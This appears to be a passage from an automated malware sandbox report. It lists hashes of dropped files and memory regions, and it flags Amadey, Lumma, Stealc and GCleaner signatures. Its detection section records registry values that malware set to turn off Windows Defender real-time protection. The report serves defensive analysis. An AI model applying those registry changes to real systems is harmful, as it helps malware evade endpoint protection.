SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

\Users\Admin\AppData\Local\Temp\is-GA2UK.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

memory/1060-87-0x0000000000800000-0x0000000000C8B000-memory.dmp

\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe

MD5 b466bf1dc60388a22cb73be01ca6bf57
SHA1 21eb9665e42d6c4a8d9e764627049b2a6e3a69a4
SHA256 e5f0f0c3383080fc2702779e3040c490ab022af69a4bc8c61bf9b1f6514ae7ad
SHA512 6cb51dae17b3bcef6254ecf6538ecc49cdd53c40c979fd743f49987b28d05c033781b1047dbf25b203b02bf70ce4205dcc1cc5bbea46119cb0e2cd0ce140cbe2

memory/1072-109-0x0000000003C10000-0x0000000003EEF000-memory.dmp

C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\sqlite3.dll

MD5 e477a96c8f2b18d6b5c27bde49c990bf
SHA1 e980c9bf41330d1e5bd04556db4646a0210f7409
SHA256 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

memory/2928-113-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/2300-117-0x0000000006C60000-0x00000000070EB000-memory.dmp

memory/2300-118-0x0000000006C60000-0x00000000070EB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe

MD5 a67e34baacfca98f323981d3b0087f3b
SHA1 d22ccae2971df83812acaebc750d9a2c87357fe5
SHA256 6092579a997945b10d3f279693baa004d180417ccfec941c45eb20705a2b4706
SHA512 39c7a33ab14e518a09f4e022c1c61c8b5a88417af3ce5a1769ab8c0fa328a178fcd79a098c4c7f3344df75e2b7cd22ebf6a88d43ad61599c53a3c89d54c29d6d

C:\Users\Admin\AppData\Local\Temp\Audit

MD5 9da23439e34b0498b82ae193c5a8f3a8
SHA1 ae20bbe7fac03c94e42f4dd206d89003faae7899
SHA256 0f241cc0324871a1a900a7ac0edf889a8d12875b1072f44856cc979a4b7a77ac
SHA512 cd4b262753b4f5f1dac09c20fa64ebdee00cf4a3fce92287a7439df943ea65bdf8569f541c2668b2164139b91facccfb3c98db8ad8f686637f4e317583cc98a2

C:\Users\Admin\AppData\Local\Temp\Commissioner

MD5 6ee7ddebff0a2b78c7ac30f6e00d1d11
SHA1 f2f57024c7cc3f9ff5f999ee20c4f5c38bfc20a2
SHA256 865347471135bb5459ad0e647e75a14ad91424b6f13a5c05d9ecd9183a8a1cf4
SHA512 57d56de2bb882f491e633972003d7c6562ef2758c3731b913ff4d15379ada575062f4de2a48ca6d6d9241852a5b8a007f52792753fd8d8fee85b9a218714efd0

memory/2300-443-0x0000000000A90000-0x0000000000F35000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Flavor

MD5 d9182f7a263f19b9876e7e1568e6c760
SHA1 d0683b5a7247a2f4a69473165d2c2649f2e1c01f
SHA256 4efff79e94f136f9bbaed62501810937785831b8c10ee9eb675ceae24cf3c4c9
SHA512 85582b94da822580eb26bc477440d87fb0a9ed98e3b75166cd96c2a18c88367c8bdd808fc43c52c2078e625efd81983e9f2e733272289833700649ad58a96a9b

C:\Users\Admin\AppData\Local\Temp\Dentists

MD5 895c5374a042a9e6c78c673690cd2275
SHA1 9dfe1b532f958f678de2bac7c74646e007a8fa14
SHA256 226099aac21e8d4a671a68b37d204339703fb696b6cc5aa30311fb55d6ab2147
SHA512 130af34bb1d12db8e86b930d8e490754687e1381a0104ac4c98cc2f02ff7fc4ed9e1d549121a013e1c32663a00d1dc8eb20d2f9831feb3c7eb17bf61a1d8d52c

C:\Users\Admin\AppData\Local\Temp\Disturbed

MD5 0e2df9a4f4d78ad0299f0377d417b39e
SHA1 a2452ab3b04b480dfc2a58a416762e280254751f
SHA256 8834f63f09734b9f284437f26cba4909ce9ae1aceafa27e2bcd7531c1a7479df
SHA512 d8194f24cc02fc030c7cf1dab5970257a79b8bcc887a8ff1ccd104e94ea809dcd266b056c80e6a0e73cba71f81e654389025c939e3135f6fafca9d51737812b8

C:\Users\Admin\AppData\Local\Temp\Revenue

MD5 aabc90b85b9c3b51543de0339d29778e
SHA1 299f5e2ca9326e0a5feefb4fc7b05da93cfd11a1
SHA256 9a0a3567f4c9b9ca46fbf41d65cdd5ce464b0efe42d6aaf7cff840addbe05d60
SHA512 3d951489d7d46874909bfd82e9cac346bdd15bbb485fc76e1ed7d6fe7bb51a7649d1f649b75bb6f6f1b6f10ea16113cd01c20aa7ea85d038fcb7fe317082edf3

C:\Users\Admin\AppData\Local\Temp\Soundtrack

MD5 b75737c804ca9949cc63bd42c945a5e6
SHA1 75c0490174adc40d1824b1024021b82dd5c762b7
SHA256 628068ee856d68776d6e9b755cd42d7a5a46af1a2a6a2c22e65db95b5d2d8f2c
SHA512 58fedd2bd6318d4b93de429d184701e059321c16872cafc978837c29985404bf432e4a2701894f7f67045f9684da40c8e14f9f557da3398c5d6eeca2e18faca7

C:\Users\Admin\AppData\Local\Temp\Zip

MD5 84f05dddefb1c72567827be553fe67fe
SHA1 c2ebcc4de3439a8206aa8faac90312bfb207ce4f
SHA256 b7de8d92196f323eb9a6237b9e902461569fd093b36e1988dee9de2ab157bb12
SHA512 99954fa07fe7cc0e54dbd0af09b32507cd998c8b44cb63f1ffe8e30667b6d1bb0949a6c95b60e40e73f0b0bb3f11e79f8fa23f696032118210cd10f03eec2904

C:\Users\Admin\AppData\Local\Temp\Proceeds

MD5 de061b898e12d89c92409f220918347f
SHA1 6b571edab30dcc4d5518e5bebb296d1f7bf5414c
SHA256 70fda66f3ea2607d6cff63d0a6a7258577690d2a9bc5105bb529889ce025d1c2
SHA512 61d94f04572643dc4274aedda51e7cb6bcccefcfa4556e6d87f94195ddf90ffbeb65909688c7bc3407f244021cc6dff0c8692fd7835ee61e6a43a0394a693a2b

C:\Users\Admin\AppData\Local\Temp\491505\B

MD5 0a1e63fc10dd1dbb8b2db81e2388bf99
SHA1 67ad39aabbf4875bc1b165ccd5afc40194d1d3c8
SHA256 122991768f589431b9166a4e22523bf48a53efff73fc2b191955e604196541b7
SHA512 94c50f06e1d157381b9d0746044b5d015e2946b44291d92739783cb3ed9e91371cf7d1b981d3108d910d7a7000810fe69fbe6590f9a84f822b671866ab9db5fc

C:\Users\Admin\AppData\Local\Temp\Justice

MD5 774df02c553d130dde3aa7496b64ebed
SHA1 e2a4aab8c3b654bd022662045fa70413a80e55f9
SHA256 ae9283c1a14b751639a75592295d85105954b761737ab77fc1e667a1498f2e9e
SHA512 c132cdf383e4fa32362d50768898ed9c6cd1e306056d066168a8ac1ee3ea7953424ff3b241ff1e0376b99b91f566b698bfef07da9bc45471097a6637dc154d11

C:\Users\Admin\AppData\Local\Temp\Artistic

MD5 d35007cc8b2860b1fe9ee861e1f2846d
SHA1 58638fd185601506b3b13fe254065aeb7edff28c
SHA256 de1e4dbe18f0b926b49aceb10157bc7f542409bad6242422efef3b831608a037
SHA512 45f851201656cb19c89274d124a7625a4c9fe12f412616a84458aa1857c61455126264416ff7fa1c9ffa99b994613baecfacd1f8179240a5021c7e5b867ea068

C:\Users\Admin\AppData\Local\Temp\1012618001\51f22cedd5.exe

MD5 c9420e178724864d8be4caa3e0600b89
SHA1 0a50a13ada835b4f831a4e47d08a9672efe13bfa
SHA256 8d74dff63ca291a7a5457b6924722959319ff92d8130954bfd8a816d117e6160
SHA512 734081b83a3213906960d9bcd6573218a22721005d7d7e1250f34de2485c49db17a9f27f34f4da33afc6c2db1ebe9be299ce4ba31a6ec20d2a78ec91dda57947

memory/1072-515-0x0000000000400000-0x00000000004BC000-memory.dmp

memory/2300-514-0x0000000006C60000-0x00000000074DE000-memory.dmp

memory/1072-513-0x0000000003C10000-0x0000000003EEF000-memory.dmp

memory/852-507-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1204-516-0x0000000000400000-0x0000000000C7E000-memory.dmp

memory/2928-518-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/2300-517-0x0000000006C60000-0x00000000074DE000-memory.dmp

memory/2928-520-0x0000000060900000-0x0000000060992000-memory.dmp

memory/2928-519-0x0000000000400000-0x00000000006DF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012619001\9eb85c1ad3.exe

MD5 4fad8d319caf757925298077224994c6
SHA1 7b9a56f22cb27e335bbcf79c1b87607ee0725f47
SHA256 7f6f12ac7230f88338f2fee645f83f064ec05b76b2900c4267189b06efccda62
SHA512 853640c1bd66ad10516551e5696e44b9099d4aa353231ffb6b45c5067ef261c63481d2cce322f536b6a2ecb1c4c0f5f0cfb61d99c8f1a1d607aacd56f2efe4a2

memory/2300-534-0x0000000006C60000-0x00000000070F2000-memory.dmp

memory/2784-536-0x0000000000A00000-0x0000000000E92000-memory.dmp

memory/2300-539-0x0000000006C60000-0x00000000074DE000-memory.dmp

memory/2300-538-0x0000000000A90000-0x0000000000F35000-memory.dmp

memory/1204-540-0x0000000000400000-0x0000000000C7E000-memory.dmp

memory/2784-542-0x0000000000A00000-0x0000000000E92000-memory.dmp

memory/2300-543-0x0000000006C60000-0x00000000074DE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012620001\992d57873c.exe

MD5 0725f1cbe54d3f3523d950c2bfda2331
SHA1 1955f4ed8036db33f8c556f66e3789466957be8d
SHA256 dd6bbafdd895585e82f07b0cb50e2cfc41e57d21060b80098e1018a2729db975
SHA512 26c750d5e6932d26a73450771e02f70d36f318e9b1a930a69a57e13b6fdd7f5c1deb91b998ccb2c356f271de2dab789fb1c720c1f0747ff40aa7c894be00a9a9

memory/2300-562-0x0000000006C60000-0x000000000714A000-memory.dmp

memory/1204-561-0x0000000000400000-0x0000000000C7E000-memory.dmp

memory/1196-565-0x00000000009D0000-0x0000000000EBA000-memory.dmp

memory/2300-564-0x0000000006C60000-0x000000000714A000-memory.dmp

memory/2928-566-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/1196-569-0x00000000009D0000-0x0000000000EBA000-memory.dmp

memory/2300-570-0x0000000006C60000-0x00000000070F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012621001\916674a606.exe

MD5 6b34ffe574e9fe52d4d2726e06dc9724
SHA1 fd838c42cc6d55864901f548d98abc4f019b895f
SHA256 7ffa2a7712d48443a2ab520d3536f62b06b04cffdc6ecdc609372a57fa526fb4
SHA512 4ac5936cdeb598963f02b4828333fbf4c41e50bb738709d1e91ba574c23fda5a6de9ffc993117dd85a3b54a3f287a17e50b27f14f84f32e11fc2f37395093ee4

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\datareporting\glean\db\data.safe.bin

MD5 e7266a200557b5f40a1e6d70113b0200
SHA1 a51520fcda41b6fbbcb8c47fa77389e4e877053f
SHA256 40ead100a2b318182acceefccb8fa170f84972e5f6ddbffcc579fd3e41333192
SHA512 bd38f2694fb2158729d93d7e05374c23ef55aa075c8528275906709265f8b69689cf3eb09c2e4116732e3644166b6ec60d5fb46d57e7286ab3d1df6619cdf030

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\datareporting\glean\pending_pings\b5dae7b7-63cf-4556-8944-43652f1bf0ca

MD5 15ccddd2ff7ffbf1936d9a51177cd5e3
SHA1 23a1a7e4a2d54cba1c58dcddcc66d53f5e593da1
SHA256 5cba2a8a9074afc25038e7b45c1330748876c4ab7dcc3eabb8ff02acea94a515
SHA512 fe33f0dd5161424e15e8bbfab08c8bc57b002e019528d3bfb1cc00468bada60e0d336864aa7327e2708f67845fc4753f612216c4f60e641a1b818d70c4d7bc25

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\datareporting\glean\pending_pings\e7a56fe5-6e5d-4eac-9bfd-a7f70d462b1e

MD5 b9179083a771ab33760411d1b6036f5f
SHA1 73ab3ed05269b318d293edc704ddf850201ce0bd
SHA256 19c6121bff1f7cad0a7c9c8b6fe2c92c9c4ade1221af1ad74d523216b8fe181c
SHA512 96828bc0abcb103050c75e871ddb8ef57c77d25d5c4badf982ae6dd33150676b42e5fe0088dc586b52033b83d6139cf8c58b5d041abfdf31f9e2958ce14c9df2

C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe

MD5 2d4351ba2544c52f579a5af3259a4d70
SHA1 c48b260375c09c4d0f6c0301d0baaab3e6330636
SHA256 937f684a9b33782223e4a7c2af7009173fa4fccc21803bbb6c9affa5e38f70dc
SHA512 b90f6be16558e2356b597978c57eecc294d3559a3e0a1719f3468f22f6f0d23ab30358d67792afbc0917733730ecda22ea0728793db9576ac0cdc4cb4940b2f5

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\z3l10m6w.default-release\activity-stream.discovery_stream.json.tmp

MD5 c3c7564aadd862b79bf996cbf04ea533
SHA1 09c94b833aff3a9b3494d850ace829fd4508b69e
SHA256 1796d9b5cb21f03f2bceb612fde6450107c124dfbe65065152ab071f5e64174b
SHA512 a8875998d52677a0e36cc5ce0637b1b2325373e1816d197167b17da5295e4266dcf32690fd45bc80220c6b0f835d5d625f53e4f9d590f02fd9462e2934311ee0

memory/2300-704-0x0000000000A90000-0x0000000000F35000-memory.dmp

memory/2300-705-0x0000000006260000-0x0000000006518000-memory.dmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\z3l10m6w.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

MD5 96c542dec016d9ec1ecc4dddfcbaac66
SHA1 6199f7648bb744efa58acf7b96fee85d938389e4
SHA256 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512 cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\prefs.js

MD5 fb293845fc33c0ead9beb4975a9bc860
SHA1 50fc75b9736c98d9acfc3e7399d09ca580e29f20
SHA256 d98740883b2a235d357da4a4158c34d5f1012b90479ce9f53acc1929105b6fa7
SHA512 5680cae22ba1b87997400eebbce3c46a5cdb6a2fba11c6cd883142fe0e904b8106bfc81afe13d131dedb01841bfcca8d63b42c90972c8c067d8dcd7a35cc10eb

memory/1728-706-0x0000000000EA0000-0x0000000001158000-memory.dmp

memory/1728-756-0x0000000000EA0000-0x0000000001158000-memory.dmp

memory/1728-757-0x0000000000EA0000-0x0000000001158000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\prefs-1.js

MD5 18e99c6d08431754fe1c49d93b20aaed
SHA1 46487464125fe3178d70dc75cb91261df27173df
SHA256 c06473b7ab2e645dc570707eaddc3e7e9c46bf7c81954fce16f9edf6aef7bea3
SHA512 b81308edbf7f158f4c994a140d3c9a855f6fdd5888921e522ad95b1ae4f4e5e34e5cb1f54bb62d3c0eeef4f767f1e135e4957362756b4c805e12a16c8124d457

memory/2928-764-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/1204-766-0x0000000000400000-0x0000000000C7E000-memory.dmp

memory/1728-774-0x0000000000EA0000-0x0000000001158000-memory.dmp

memory/2300-773-0x0000000006260000-0x0000000006518000-memory.dmp

memory/2300-781-0x0000000000A90000-0x0000000000F35000-memory.dmp

memory/1728-784-0x0000000000EA0000-0x0000000001158000-memory.dmp

memory/1204-787-0x0000000000400000-0x0000000000C7E000-memory.dmp

memory/2928-791-0x0000000000400000-0x00000000006DF000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\sessionstore-backups\recovery.jsonlz4

MD5 12b9be75331a1af73f8233f1b0400b75
SHA1 774c959e75088e0b1e97ad352a5e7ed7dae1e22f
SHA256 137269a65bb6e1323326b20665b121f7e72a18d1038381550cafd02ed5984434
SHA512 741768a0c3e985899b944026eaecda60800b429fd3ebf7c9d8115af3a857ce2cbcc1f85e4ae4041abd50e109fbd238c7148bf6f8b77b1fa2a0de83bad754a2bf

memory/2300-798-0x0000000000A90000-0x0000000000F35000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

MD5 fe3355639648c417e8307c6d051e3e37
SHA1 f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA256 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA512 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

MD5 3d33cdc0b3d281e67dd52e14435dd04f
SHA1 4db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256 f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512 a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 85430baed3398695717b0263807cf97c
SHA1 fffbee923cea216f50fce5d54219a188a5100f41
SHA256 a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA512 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

memory/1204-827-0x0000000000400000-0x0000000000C7E000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\prefs-1.js

MD5 d63a79eb86b2105de92c29bda661922b
SHA1 81fa09af749bacafc566f4b9255e00cbb10838f1
SHA256 6e41694db40f2d0740a76399b8e89209e101d225a6d241d99fdd485ba6cc76e2
SHA512 e49a29631a737955021b776d235d82c0aa3391a2a4605f3e023dff586d2c4aff970bf439ec188df5cd8ea2bebe4c01e7da1cf22b4f567cd0fa1bd101492c5483

\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe

MD5 b58b926c3574d28d5b7fdd2ca3ec30d5
SHA1 d260c4ffd603a9cfc057fcb83d678b1cecdf86f9
SHA256 6e70b56d748c4ccab13cc8a055d3795ea0dd95fe3b70568d7d3ac0c6621140a3
SHA512 b13cb998822b716b695013bcd6dec62a2290567d0d1743b2d982ca084235cf69c6ea1fc91c9d4e62657c6f9e102c7c60e81296ab055ffe43b887c5f8ec8958ab

memory/2928-841-0x0000000000400000-0x00000000006DF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 a01c5ecd6108350ae23d2cddf0e77c17
SHA1 c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512 b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

MD5 49ddb419d96dceb9069018535fb2e2fc
SHA1 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA256 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA512 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

MD5 8be33af717bb1b67fbd61c3f4b807e9e
SHA1 7cf17656d174d951957ff36810e874a134dd49e0
SHA256 e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA512 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

MD5 33bf7b0439480effb9fb212efce87b13
SHA1 cee50f2745edc6dc291887b6075ca64d716f495a
SHA256 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512 d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

MD5 688bed3676d2104e7f17ae1cd2c59404
SHA1 952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA256 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA512 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

MD5 937326fead5fd401f6cca9118bd9ade9
SHA1 4526a57d4ae14ed29b37632c72aef3c408189d91
SHA256 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512 b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

memory/4020-880-0x00000000003C0000-0x00000000007C4000-memory.dmp

memory/4020-883-0x00000000003C0000-0x00000000007C4000-memory.dmp

memory/4020-882-0x00000000003C0000-0x00000000007C4000-memory.dmp

memory/4020-886-0x00000000008E0000-0x00000000008EE000-memory.dmp

memory/4020-887-0x0000000001120000-0x000000000117C000-memory.dmp

memory/4020-888-0x00000000009F0000-0x0000000000A02000-memory.dmp

memory/4020-889-0x0000000000A50000-0x0000000000A58000-memory.dmp

memory/4020-890-0x0000000000A60000-0x0000000000A68000-memory.dmp

memory/4020-891-0x0000000000A70000-0x0000000000A78000-memory.dmp

memory/4020-892-0x0000000000A80000-0x0000000000A98000-memory.dmp

memory/4020-893-0x0000000000EA0000-0x0000000000EB0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\prefs-1.js

MD5 409083e8184d718a6fcc1556ed8f3c01
SHA1 de4cf88e68a9b5f824e5db7fa213fe17d4d417e2
SHA256 e3dca45bb057f11a9c6f9c1066efa848c552ecf2180158b2e1b60643840d752c
SHA512 972dcf079d51268e287cbf4555ecb68635e957ab7ff360acf8c90b04cd54ccbb49f78e7224031d68aa949da6666c6dc2316880b45946e1e51303148259e0a747

C:\Users\Admin\AppData\Local\Temp\CabD693.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/2300-919-0x0000000000A90000-0x0000000000F35000-memory.dmp

memory/1204-923-0x0000000000400000-0x0000000000C7E000-memory.dmp

memory/2928-924-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/2928-926-0x0000000002B40000-0x0000000002BE1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\download.bat

MD5 f2a75175c8082ccd3e1713b00556a6e2
SHA1 2f5dc37978320bc1ca207c0c0aff1240aad6c7cf
SHA256 019157c15709f7d6301cb0fb15f45c054230ea91f06ff817b426d7f6ccb14686
SHA512 011ab44e81d61636d5b1637584faf0701a5b2226289b6200cd89ad97927f52f1c659df626afc2b46edd656960d67934fff97f5e10fd6a7454027d430feafa7a9

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 4f60802c8c95046fdf586445fd37cdb1
SHA1 b96daa6f50eb6586e9be452fb5cf10a5f671415a
SHA256 727e58c010ea14c632113bfdac4c97577c20f0b8349c1ad8a3fbd3fe94ff4fdb
SHA512 8f2761416c336d1eb324678807df1fa3a45da4ee71380470ce8271decd24af70f0a868b2cb90290b6e9b1b7f2db27626cba91c9d97978ebdd6c8c535b70ecca7

C:\Users\Admin\AppData\Local\Temp\runsteal.bat

MD5 744f8978db36b4b9db7cb6e5c8c41e08
SHA1 84321921f622d20a4d40c9bef43b7744e74aaee7
SHA256 cedfe277f8c600679365ce2c54a9c303907a0acadc23ed6e6968746d2e8ca468
SHA512 d1584b2134bf3960af33a514b3a9fba69c7eb2fbbc3b0cffe7e493f182b20547f7596012fcc5e6b5ffbefee5a0b7d1afe45eee822cff5b0720ffd6292af2394f

C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat

MD5 d1fdfad5ce7134b1ef5a54cf37001031
SHA1 82e0f4e953b3aeaca622ec071639baf6ae17aadb
SHA256 54f8474d983dc3dd78e3d3289076152651e2f8cc5f30ae3f2740ba15e71cc6a6
SHA512 b6b7b4f134a6b436cd32e39fb645d91acc12482d352158a755359d0f6cbb8fd5bab9351081916b0b638e3ff2bde4b6ac2f6202f3ca58f1146f39defc039e88e7

C:\Users\Admin\AppData\Local\Temp\smartscreen.exe

MD5 1fed66d1f6b85bda20fe0403ca01c9bd
SHA1 6a3056191a7d8da167285b2bf5f9fa671022c8c1
SHA256 924ee12f6a98aeeb1c7836ec8984f0f93216bfff0433bcd4ee643d33d96db74a
SHA512 0fb1397078689a52d1c77cc239b1e42afa5ff87a3f5b4f825705e9bda1bd2c58bfb50a6067ea0a202fa7edb0a890cbac9314413fc8757c8b75a43fa0b12ef613

memory/3976-972-0x0000000000020000-0x000000000004E000-memory.dmp

memory/2300-989-0x0000000000A90000-0x0000000000F35000-memory.dmp

memory/1204-992-0x0000000000400000-0x0000000000C7E000-memory.dmp

memory/2928-993-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/2300-996-0x0000000000A90000-0x0000000000F35000-memory.dmp

memory/1204-999-0x0000000000400000-0x0000000000C7E000-memory.dmp

memory/2928-1000-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/2300-1009-0x0000000000A90000-0x0000000000F35000-memory.dmp

memory/1204-1015-0x0000000000400000-0x0000000000C7E000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-06 05:58

Reported

2024-12-06 06:00

Platform

win10v2004-20241007-en

Max time kernel

118s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A

Stealc

stealer stealc

Stealc family

stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
